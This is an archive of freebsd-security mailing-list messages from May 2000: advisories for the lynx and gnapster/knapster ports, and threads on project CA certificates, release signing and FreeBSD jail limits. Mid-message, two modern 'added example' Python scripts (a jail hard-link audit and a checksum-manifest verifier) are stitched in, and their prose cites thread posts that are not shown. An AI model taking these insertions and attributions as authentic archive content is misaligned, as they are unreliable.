At this time the lynx-ssl/ja-lynx/ja-lynx-current ports are not yet updated to a safe version of lynx: this advisory will be reissued again once they are.

1) Upgrade your entire ports collection and rebuild the lynx or lynx-current port.

2) Reinstall a new lynx package dated after the correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/lynx-2.8.3.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/lynx-2.8.3.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/lynx-2.8.3.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/lynx-2.8.3.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/lynx-2.8.3.1.tgz

Note that the lynx-current port is not automatically built as a package.

3) download a new port skeleton for the lynx/lynx-current port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz

VI. Revision History

v1.0 2000-03-15 Initial release
v1.1 2000-05-17 Update to note fix of lynx and lynx-current ports.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOSMQT1UuHi5z0oilAQHlgwP9EiLqvf8MM55fvftEXPMfL6PJ6HFQPYMH
+TqX5Q/P9s0mgBFiGfN8wblmtEUyZ1GwF8goPa9fqqJIfNg8Qu2zWqJOYPjc20hW
yo3Rxbi+lEWOYxLpxBKDhvBH7yWxiV8Nm1+w73a76BjaZ20E0b91hgw2lebFiZPi
uzK38WjnFNQ=
=qWEC
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed May 17 14:40: 5 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 2DC8137BCDE; Wed, 17 May 2000 14:39:50 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:18.gnapster [REVISED]
Reply-To: security-officer@freebsd.org
From: FreeBSD Security Officer
Message-Id: <20000517213950.2DC8137BCDE@hub.freebsd.org>
Date: Wed, 17 May 2000 14:39:50 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:18 Security Advisory
FreeBSD, Inc.

Topic: gnapster/knapster ports allow remote users to view local files

Category: ports
Module: gnapster/knapster
Announced: 2000-05-09
Reissued: 2000-05-16
Credits: Fixed by vendor. Knapster vulnerability pointed out by: Tom Daniels via BugTraq
Affects: Ports collection.
Corrected: 2000-04-29 (gnapster)
2000-05-01 (knapster)
Vendor status: Updated version released.
FreeBSD only: NO

I. Background

Gnapster and knapster are clients for the Napster file-sharing network.

II. Problem Description

The gnapster port (version 1.3.8 and earlier), and the knapster port (version 0.9 and earlier) contain a vulnerability which allows remote napster users to view any file on the local system which is accessible to the user running gnapster/knapster.
Gnapster and knapster do not run with elevated privileges, so it is only the user's regular filesystem access permissions which are involved.

Note that there may be further undiscovered bugs in these and other napster clients leading to a similar vulnerability. System administrators and users should exercise discretion in installing a napster client on their system.

The gnapster/knapster ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Remote users can view files accessible to the user running the gnapster/knapster client.

If you have not chosen to install a napster client, then your system is not vulnerable to this problem.

IV. Workaround

Deinstall the gnapster and/or knapster port/package, if you have installed them.

V. Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the gnapster and/or knapster port.
2) Reinstall a new package dated after the correction date, obtained from:

[gnapster]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/gnapster-1.3.9.tgz

[knapster]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/knapster-0.10.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/knapster-0.10.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/knapster-0.10.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/knapster-0.10.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/knapster-0.10.tgz

3) download a new port skeleton for the gnapster/knapster ports from:

http://www.freebsd.org/ports/

and use it to rebuild the port(s).

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz

VI. Revision History

v1.0 2000-05-09 Initial release
v1.1 2000-05-16 Update to note that knapster 0.9 is also vulnerable and broaden warning to include all napster clients.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOSMRPVUuHi5z0oilAQHclAP/X+2Xdki6PUEZ/fCHdwZTLEC0kQNenOJ9
oWxWFuI4z3jpylQ3CweIoo9akx32ZzyIVHTViG3mF2BC+NRQShl1aXu2MYqy6vKc
c4R+oHxx2OeYSQo4Q8rS8Ttxa543ynXg9wLBL0vtGMq07GtVYTXpg1+Ooi+QKe2o
9JMpcxAohAQ=
=2iHQ
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed May 17 14:42:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8DB1D37BCBB; Wed, 17 May 2000 14:42:14 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id RAA25744; Wed, 17 May 2000 17:42:05 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Wed, 17 May 2000 17:42:05 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Kris Kennaway
Cc: Garrett Wollman , security@FreeBSD.org, Darren Reed , Peter Wemm
Subject: Re: HEADS UP: New host key for freefall!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 17 May 2000, Kris Kennaway wrote:

> On Wed, 17 May 2000, Garrett Wollman wrote:
>
> > organizations which use X.509 for internal authentication purposes
> > run their own CAs and deploy customized Web-browser installations
> > which come with the appropriate CA certs preinstalled. (My employer,
> > which owns tens of thousands of computers and has almost as many
> > employees, does this. People who install the ``latest and greatest''
> > browser from wherever don't get support.)
>
> We could implement this without too much trouble by shipping the root cert
> on CD with FreeBSD releases (and having some kind of online distribution
> method, perhaps signed by a bunch of PGP keys) and instructing people on
> how to load it into netscape (if it were to be used for https purposes).
> Perhaps we could even make the netscape port pre-load it - we already have
> the infrastructure for customizing netscape prior to use.

The typical cheap-skate response to other CA's being expensive is to get an SSL cert from Thawte or Verisign, and distribute your certs via a web site hosted using that well-known CA. You don't get the automated cert evaluation, but can provide a trusted path for cert retrieval.

In a prior e-mail, someone raised that doing a full secure facility is not necessary given the size of the project. It's useful to understand who will be relying on these keys as a means of evaluating the need for doing the "CA" thing properly:

1) Is it just the committers? (small community that can forgive mistakes)
2) Is it committers + developers? (larger and less forgiving community)
3) Is it the general user population? (extremely large community with their jobs and businesses on the line)

In addition, how will the certs be used?

1) For manual verification and retrieval only?
2) For automated installation of security patches?

My assertion is that if we begin distributing software in a signed way, we need to do it right. This means signing all release announcements, signing md5 checksum sets over releases, signing security updates that can be installed using a binary installer, etc. We also need to understand that in more and more places, digital signatures now have legal connotations. Are we accepting more responsibility by signing things in these places? Do we become more liable? Hopefully the answer on this front is no, but it is important that we be sure.
Similarly, if we start signing things, people will assume they can have greater confidence when installing over the network, et al. Is this true?

Robert N M Watson
robert@fledge.watson.org http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Wed May 17 14:53:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 5517737BD1A; Wed, 17 May 2000 14:53:16 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id OAA09714; Wed, 17 May 2000 14:53:15 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id OAA30127; Wed, 17 May 2000 14:53:14 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id OAA01533; Wed, 17 May 2000 14:53:13 -0700 (PDT)
From: Don Lewis
Message-Id: <200005172153.OAA01533@salsa.gv.tsc.tdk.com>
Date: Wed, 17 May 2000 14:53:13 -0700
In-Reply-To:
References:
X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98)
To: Robert Watson , Geoffrey Robinson
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On May 16, 1:05pm, Robert Watson wrote:
} Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
} On Mon, 15 May 2000, Geoffrey Robinson wrote:
} > aware that raw sockets are not allowed to jailed processes but is there
} > a workaround for ping and traceroute?
}
} Currently, no. Due to the way raw sockets work (allowing listening for
} all non-handled IP messages, and allowing direct writing of IP packets),
} it would take a bit of work to get this up and running, although it would
} be feasible. A more promising long-term goal might be to better
} virtualize network services, creating virtual interfaces and binding real
} network resources to virtual interfaces.

I think this is the right way to go. The current jail implementation is not compatible with IPv6, and there is no way to confine a dual homed proxy server to a jail, since the jail is only allowed one IP address.

If the jail used virtual network interfaces, then it would be possible to add packet filter rules to these network interfaces. This would be much more flexible than the current implementation, since it would then be possible to have fine grained control over the network connections allowed into and out of the jail. It would also be possible for multiple jails to share the same IP address but be restricted to disjoint port ranges.

} > Finally how secure is jail really? I'm aware of a trivial chroot breakout
} > technique. Does that hole still exist? Are there any other known holes? Is
} > jail still under active development? Is it worth the trouble to do any of
} > this?

} Right now my efforts are primarily aimed at improving the security
} abstractions within the kernel relating to the TrustedBSD project--this
} should have a side benefit of improving the relationship between jail()
} and the base OS, making Jail easier to maintain and modify.

I think this is also the right thing to do. I would go so far as to deprecate the jail(2) syscall, and implement jail(8) in terms of the syscalls to set up the virtual network interfaces, the syscalls to set the process capabilities, and chroot().
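The shared-base-file question raised earlier in this thread (Dan Harnett: a modified sshd or telnetd hard-linked into every jail turns one compromise into many; Jacques Vidrine: the shared files are assumed read-only, or better, schg) suggests a concrete audit a jail host can run. The script below is an added example, not code from the thread or from FreeBSD: it walks a set of jail roots, groups regular files by inode, and reports every file that appears under more than one root yet is not marked SF_IMMUTABLE (schg) or is writable by mode. The two-jail layout it builds under a temporary directory is constructed for the demonstration, and the names `audit_shared_files`, `make_sample_jails` and `demo` are the example's own. On systems whose `stat` has no `st_flags` (everything that is not BSD-derived) there is no schg to check, so every shared file is reported as "not schg".

```python
"""Audit jail roots for hard-linked base files that one jail could modify
for all the others.  Added example; constructed sample data only."""
import os
import stat
import tempfile
from collections import defaultdict

# BSD "schg" bit; Python's stat module defines it on every platform, but the
# getattr keeps the script running on older interpreters.
SF_IMMUTABLE = getattr(stat, "SF_IMMUTABLE", 0x00020000)


def _is_immutable(st):
    # st_flags exists only on BSD-derived systems.  Elsewhere a shared file
    # can only be protected by a read-only mount, which stat cannot see.
    return bool(getattr(st, "st_flags", 0) & SF_IMMUTABLE)


def audit_shared_files(jail_roots):
    """Return findings for regular files whose inode is linked into more
    than one jail root and which are not schg, or are writable by mode."""
    by_inode = defaultdict(list)      # (dev, ino) -> [(jail name, path)]
    stats = {}
    for root in jail_roots:
        name = os.path.basename(root.rstrip(os.sep))
        for dirpath, _dirs, files in os.walk(root):
            for fn in files:
                path = os.path.join(dirpath, fn)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                key = (st.st_dev, st.st_ino)
                by_inode[key].append((name, path))
                stats[key] = st

    findings = []
    for key, owners in by_inode.items():
        jails = sorted({name for name, _ in owners})
        if len(jails) < 2:
            continue                  # private to one jail: not our concern
        st = stats[key]
        reasons = []
        if not _is_immutable(st):
            reasons.append("not schg")
        if st.st_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("writable mode %o" % stat.S_IMODE(st.st_mode))
        if reasons:
            findings.append({"paths": sorted(p for _, p in owners),
                             "jails": jails, "reasons": reasons})
    return sorted(findings, key=lambda f: f["paths"][0])


def make_sample_jails(base):
    """Constructed layout: two jail roots sharing two hard-linked base files.
    'sshd' is mode 0555 (still reportable: not schg); 'login.conf' was left
    mode 0644.  'rc.conf' is private to jail1 and must not be reported."""
    for jail in ("jail1", "jail2"):
        os.makedirs(os.path.join(base, jail, "usr", "sbin"))
        os.makedirs(os.path.join(base, jail, "etc"))
    shared = {("usr", "sbin", "sshd"): 0o555, ("etc", "login.conf"): 0o644}
    for parts, mode in shared.items():
        src = os.path.join(base, "jail1", *parts)
        with open(src, "w") as f:
            f.write("constructed sample content\n")
        os.chmod(src, mode)
        os.link(src, os.path.join(base, "jail2", *parts))
    with open(os.path.join(base, "jail1", "etc", "rc.conf"), "w") as f:
        f.write('hostname="jail1"\n')
    return [os.path.join(base, "jail1"), os.path.join(base, "jail2")]


def demo():
    """Build the sample jails in a scratch directory and audit them."""
    with tempfile.TemporaryDirectory() as base:
        return audit_shared_files(make_sample_jails(base))


if __name__ == "__main__":
    for finding in demo():
        print(", ".join(finding["reasons"]), "->", finding["paths"])
```

Run against real roots, pass the jail directories to `audit_shared_files`; anything it lists is a file that a root process inside one jail could alter for every jail that links it, unless the mount itself is read-only. Setting schg on the shared set (and raising securelevel so it cannot be cleared from inside a jail) makes the audit come back empty, which is the state Jacques's reply assumes.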
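Robert Watson's remark above about signing md5 checksum sets over releases, together with the advisories' instruction to fetch replacement packages from ftp.FreeBSD.org, comes down to a manifest that the recipient checks against the files actually received. The script below is an added example, not code from the thread or from FreeBSD's release tooling: it writes a manifest in the `MD5 (path) = digest` style that md5(1) and sha256(1) print, honours an exclude list for files that legitimately change, and verifies a tree against it, reporting modified, missing and unexpected files. The file tree and the tampering it simulates are constructed inside a temporary directory, and the function names are the example's own. Signing the manifest (with PGP, as the thread discusses) is outside the example; the point is that one signature covers a small manifest and the manifest covers the whole release.

```python
"""Build and verify a checksum manifest over a release tree.
Added example; constructed sample data only."""
import hashlib
import os
import tempfile


def _digest(path, algo):
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _walk(root, exclude):
    """Yield relative paths of regular files, skipping excluded paths and
    anything below an excluded directory, in a stable sorted order."""
    excluded_dirs = tuple(e.rstrip("/") + "/" for e in exclude)
    for dirpath, dirs, files in os.walk(root):
        dirs.sort()
        for fn in sorted(files):
            rel = os.path.relpath(os.path.join(dirpath, fn), root)
            if rel in exclude or rel.startswith(excluded_dirs):
                continue
            yield rel


def build_manifest(root, exclude=(), algos=("md5", "sha256")):
    """Return manifest text: one 'ALGO (relative/path) = hexdigest' line
    per file and algorithm, the format md5(1)/sha256(1) print."""
    lines = []
    for rel in _walk(root, exclude):
        for algo in algos:
            lines.append("%s (%s) = %s"
                         % (algo.upper(), rel, _digest(os.path.join(root, rel), algo)))
    return "\n".join(lines) + "\n"


def parse_manifest(text):
    """Map (algo, relative path) -> expected hexdigest."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        head, hexd = line.rsplit(" = ", 1)
        algo, _, rest = head.partition(" (")
        entries[(algo.lower(), rest[:-1])] = hexd   # rest ends with ')'
    return entries


def verify_manifest(root, text, exclude=()):
    """Compare a tree with a manifest.  Returns the three lists a recipient
    needs: files whose digest changed, files the manifest lists but the tree
    lacks, and files present in the tree that the manifest never covered."""
    want = parse_manifest(text)
    present = set(_walk(root, exclude))
    listed = {rel for _, rel in want}
    modified, missing = [], []
    for (algo, rel), hexd in sorted(want.items()):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            if rel not in missing:
                missing.append(rel)
        elif _digest(path, algo) != hexd and rel not in modified:
            modified.append(rel)
    return {"modified": modified, "missing": sorted(missing),
            "unexpected": sorted(present - listed)}


def demo():
    """Constructed release tree, then a changed binary, a dropped file, an
    extra file and a log write; only the first three should be reported."""
    files = {"bin/ls": b"ls binary", "etc/passwd": b"root:*:0:0:Charlie &:/root:/bin/sh\n",
             "var/log/messages": b"boot\n"}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        exclude = ("var/log",)          # constantly-changing files
        manifest = build_manifest(root, exclude)
        clean = verify_manifest(root, manifest, exclude)
        with open(os.path.join(root, "bin", "ls"), "ab") as f:
            f.write(b"\x90")            # binary altered after release
        os.remove(os.path.join(root, "etc", "passwd"))
        with open(os.path.join(root, "bin", "sh"), "wb") as f:
            f.write(b"not in the release")
        with open(os.path.join(root, "var", "log", "messages"), "ab") as f:
            f.write(b"more\n")          # excluded, must not be reported
        tampered = verify_manifest(root, manifest, exclude)
    return clean, tampered


if __name__ == "__main__":
    print(demo())
```

Two caveats a practitioner would add: the manifest is only as trustworthy as the signature over it, so check that first and never accept a manifest that arrives unsigned over the same channel as the files; and MD5 is kept here because it is what the thread names, but it is no longer collision-resistant, so a stronger digest must be carried alongside it, as the example does with SHA-256.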
From owner-freebsd-security Wed May 17 15:02:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id D6A5A37BDB3; Wed, 17 May 2000 15:02:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id PAA09830; Wed, 17 May 2000 15:02:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id PAA30169; Wed, 17 May 2000 15:02:33 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id PAA01574; Wed, 17 May 2000 15:02:33 -0700 (PDT)
From: Don Lewis
Message-Id: <200005172202.PAA01574@salsa.gv.tsc.tdk.com>
Date: Wed, 17 May 2000 15:02:33 -0700
In-Reply-To:
References:
X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98)
To: Robert Watson
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On May 17, 11:05am, Robert Watson wrote:
} Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
} One way to substantially improve jail scalability would be to allow the
} same (read-only) file system to be present in all jails as the root, with
} only jail-local data being modified. You can imagine gratuitously using
} nullfs (if it worked) to do this, and mount per-jail writable fs's for
} appropriate subdirectories (/etc, /usr/local, /home) with appropriate
} symlinks within the jail.

I badly want nullfs for another reason. It can be really handy to allow separate jails to communicate through the filesystem.
Imagine updating a set of web pages using rsync over ssh in one jail, and sharing these via a read-only mount in another jail where the web server is running.

From owner-freebsd-security Wed May 17 15:49:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from falcon.grobin.org (falcon.grobin.org [204.225.173.44]) by hub.freebsd.org (Postfix) with ESMTP id 05ECD37B610; Wed, 17 May 2000 15:49:03 -0700 (PDT) (envelope-from geoff@grobin.org)
Received: by falcon.grobin.org (Postfix, from userid 1000) id F326D2D5; Wed, 17 May 2000 18:51:04 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by falcon.grobin.org (Postfix) with ESMTP id ECBC4ED; Wed, 17 May 2000 18:51:04 -0400 (EDT)
Date: Wed, 17 May 2000 18:51:04 -0400 (EDT)
From: Geoffrey Robinson
To: Robert Watson
Cc: security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 17 May 2000, Robert Watson wrote:

> > If a process running in the host system created a UNIX domain socket or
> > named pipe within the jail directory tree, would a process running in the
> > jail be able to connect to and communicate with the host process through
> > this socket or pipe? If so I guess you could create a workaround for just
> > about anything by running it on the host system. Would this create a
> > potential way of defeating the jail?
>
> Jail works by:
>
> 1) Chrooting the child process
> 2) Limiting the scope of superuser privileges accessible by uid0 processes
> in the jail
>
> It does not attempt to prevent processes outside the jail from
> communicating with processes within the jail. As such, having a process
> do so wouldn't defeat the jail per se, but would defeat the purpose of the
> jail :-).
Still, like any network service, the security impact would depend on how well the server application was written, not on the fact you have a link to the host system. Right?

> I'm not clear on why that would happen -- the libc (etc, etc) in each jail
> should be kept in synch with the kernel, however, and that could be a source
> of your problems. I.e., if you upgrade the kernel, it exports the same
> syscall interface to all processes, regardless of jails, so all jails
> making use of syscalls that have changed need to be upgraded in synch.
>
> This is the same as upgrading the kernel without upgrading your normal
> world.
>
> One way to substantially improve jail scalability would be to allow the
> same (read-only) file system to be present in all jails as the root, with
> only jail-local data being modified. You can imagine gratuitously using
> nullfs (if it worked) to do this, and mount per-jail writable fs's for
> appropriate subdirectories (/etc, /usr/local, /home) with appropriate
> symlinks within the jail. Right now, each jail costs you the size of
> world, and is hard to upgrade if you have any decent number of jails.
> Storing all that stuff in a single tree mapped read-only into jails would
> solve that (you'd probably want two so you could upgrade one, test it, and
> then swap to that for all jails so as to minimize downtime).

If I wanted to do that, would it be as easy as building a jail on a spare partition then mounting it read-only to the correct locations?

------------------------------------------------------------------------------
| Geoffrey Robinson - geoff@grobin.org |
------------------------------------------------------------------------------
Random Fortune Quote
"What's another word for Thesaurus?"
-- Steven Wright

From owner-freebsd-security Wed May 17 22:14:02 2000
Delivered-To: freebsd-security@freebsd.org
Received: from androcles.com (androcles.com [204.57.240.10]) by hub.freebsd.org (Postfix) with ESMTP id A3C4E37B685; Wed, 17 May 2000 22:13:53 -0700 (PDT) (envelope-from alex@androcles.com)
Received: (from dhh@localhost) by androcles.com (8.9.3/8.9.3) id WAA03159; Wed, 17 May 2000 22:13:44 -0700 (PDT)
Message-ID:
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
In-Reply-To:
Date: Wed, 17 May 2000 22:13:44 -0700 (PDT)
From: "Duane H. Hesser"
To: Robert Watson
Subject: Re: HEADS UP: New host key for freefall!
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 17-May-00 Robert Watson wrote:
> On Wed, 17 May 2000, Kris Kennaway wrote:
>
>> On Wed, 17 May 2000, Garrett Wollman wrote:
>>
>> > organizations which use X.509 for internal authentication purposes
>> > run their own CAs and deploy customized Web-browser installations
>> > which come with the appropriate CA certs preinstalled. (My employer,
>> > which owns tens of thousands of computers and has almost as many
>> > employees, does this. People who install the ``latest and greatest''
>> > browser from wherever don't get support.)
>>
>> We could implement this without too much trouble by shipping the root cert
>> on CD with FreeBSD releases (and having some kind of online distribution
>> method, perhaps signed by a bunch of PGP keys) and instructing people on
>> how to load it into netscape (if it were to be used for https purposes).
>> Perhaps we could even make the netscape port pre-load it - we already have
>> the infrastructure for customizing netscape prior to use.
>

Browsers are equipped to download new CA certs and install them in the database. Netscape and MS do it differently, of course, so (at least) two formats must be provided. Grabees must be confident of the site from which the cert is obtained, of course.

> The typical cheap-skate response to other CA's being expensive is to get
> an SSL cert from Thawte or Verisign, and distribute your certs via a web
> site hosted using that well-known CA. You don't get the automated cert
> evaluation, but can provide a trusted path for cert retrieval.
>

Are you talking about a server cert here? That would allow securely distributing your own CA cert (as mentioned above), but doesn't give you any signing capability. I'm not sure what you mean by "automated cert evaluation".

> In a prior e-mail, someone raised that doing a full secure facility is not
> necessary given the size of the project. It's useful to understand who
> will be relying on these keys as a means of evaluating the need for doing
> the "CA" thing properly:
>
> 1) Is it just the committers? (small community that can forgive mistakes)
> 2) Is it committers + developers? (larger and less forgiving community)
> 3) Is it the general user population? (extremely large community with their
> jobs and businesses on the line)
>
> In addition, how will the certs be used?
>
> 1) For manual verification and retrieval only?
> 2) For automated installation of security patches?
>

Those are some good questions; there are lots more. The first step, as you all know, to designing any system is to decide exactly what the system is to do. Will the certs be used for SSL only? Will they be used for signing? How many levels of certificate will you need? You will need some specific policies and a Certificate Practice Statement to go along with them (look at Verisign's CPS some time).
Entrust used to have some good white papers describing some of the issues involved in setting up a CA and the responsibilities of a CA--I think the good ones are mostly gone now.

You need to think about archiving, possibly for decades. How many people does it take to exercise the signing key? How much confidence can users expect to place in certs you've signed? What will you do if a cert is compromised? What will you do if your signing key is compromised? Do you have a secure vault to lock up the keys and the signing engine (most CAs do just that)? A secure repository for certificates? Will your CA sign the keys of subservient CAs? What about auditing (who, how often)? Certificate revocation? Will your certs support non-repudiation? What process will be used to validate the identity of the applicant (at each level of certificate)? Key management? What happens when a user's cert expires? How easy (hard, reliable) will it be to renew? What key sizes will you support? What key size will you use for your signing key?

You can punt many of these issues by becoming a Registration Authority for an existing CA (e.g. Verisign's Onsite program). If you do, you relinquish some of the advantages of running your own CA (e.g. Quality of Service, Reliability, Control). Either way, you'll pay per certificate, either a one-time per-cert royalty or a per-cert fee. Commercial software works that way (and low-volume fees aren't cheap, in my estimation). How long will the fight over the use of Java and/or JavaScript in the CA system last, and how many friends will it alienate?

You *really* need to have your ducks in a row if you're going to establish an X509 CA. None of this is intended to discourage the effort--I'm a long-time proponent of the use of public/private key cryptography as an aid to authentication. X509 certs are the most likely way to get there at this point (but I've been assuming that for 4 years, and *nobody* is signing documents--or even applets--online yet).
How many people do you know who have client certs, even to access their bank account, or their company 401k? They're still using PIN numbers, for G* sake. There may be better ways for small (say, less than a million participant) open-source groups to do roughly what is implied by the conversation I've seen so far, but X509 will work if you're willing to pay the freight.

> My assertion is that if we begin distributing software in a signed way, we
> need to do it right. This means signing all release announcements,
> signing md5 checksum sets over releases, signing security updates that can
> be installed using a binary installer, etc.
>
> We also need to understand that in more and more places, digital
> signatures now have legal connotations. Are we accepting more
> responsibility by signing things in these places? Do we become more
> liable? Hopefully the answer on this front is no, but it is important
> that we be sure. ...

Digital signatures have always had legal implications; it's just that nobody knew just what they were. Check that...nobody *knows* just what they are. It's possible to deduce logically what the implications are, and to prepare elaborate Certificate Practice Statements outlining the responsibility you're willing to accept, but no one has ever accused the US court system of elaborate concern for logic (sorry, I have no data for the rest of the world). To the best of my knowledge (and I've been watching for 3 or 4 years) there has never been a court case regarding certificates which might even *begin* to illuminate the position courts will take on relevant issues (anywhere in the world). The ABA does have guidelines (and some state bars are issuing certs themselves), and several states have CA licensing laws (Utah, California, Washington, that I can think of, and others). Some states have "electronic signature" laws which do little more than confuse the situation. The US Congress is of course bickering slowly over the topic.
McBride, Baker and Coles (a law firm) have a page which has been tracking these issues in the US for years: http://www.mbc.com/ecommerce.html There are also links to information for many other countries.

> ... Similarly, if we start signing things, people will
> assume they can have greater confidence when installing over the network,
> et al. Is this true?
>
> Robert N M Watson
>

Presumably, they will have as much confidence as the CPS says they can have. You *have* read Verisign's CPS, haven't you?

Here's the URL to Entrust's papers on the topic--there are still a few useful ones, if you have time to paw through lots of PDFs: http://www.entrust.com/resourcecenter/whitepapers.htm

Here are URLs to some CAs that have sprung up in Utah (and one in Washington) since their Digital Signature laws were passed. They may be informative. (Verisign and Thawte aren't the only games in town.)

http://www.arcanvs.com/
http://www.usertrust.com/
http://www.digsigtrust.com/
http://www.caserver.com/ (Houston, we have a CA)
http://www.idcertify.com/ (Seattle)
http://www.cost.se/ca_int22.htm (ok, this is not Utah...)

